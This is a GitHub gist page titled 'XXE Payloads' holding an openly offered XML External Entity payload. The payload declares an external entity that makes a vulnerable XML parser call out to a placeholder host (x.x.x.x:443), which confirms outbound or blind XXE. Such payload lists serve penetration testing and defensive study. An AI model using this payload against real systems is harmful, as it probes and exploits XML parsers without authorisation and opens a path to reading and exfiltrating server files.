Skip to content

Instantly share code, notes, and snippets.

View C1h2e1's full-sized avatar
๐Ÿ˜„
hunting

C1h2e1

๐Ÿ˜„
hunting
View GitHub Profile
@staaldraad
staaldraad / XXE_payloads
Last active December 6, 2025 04:13
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>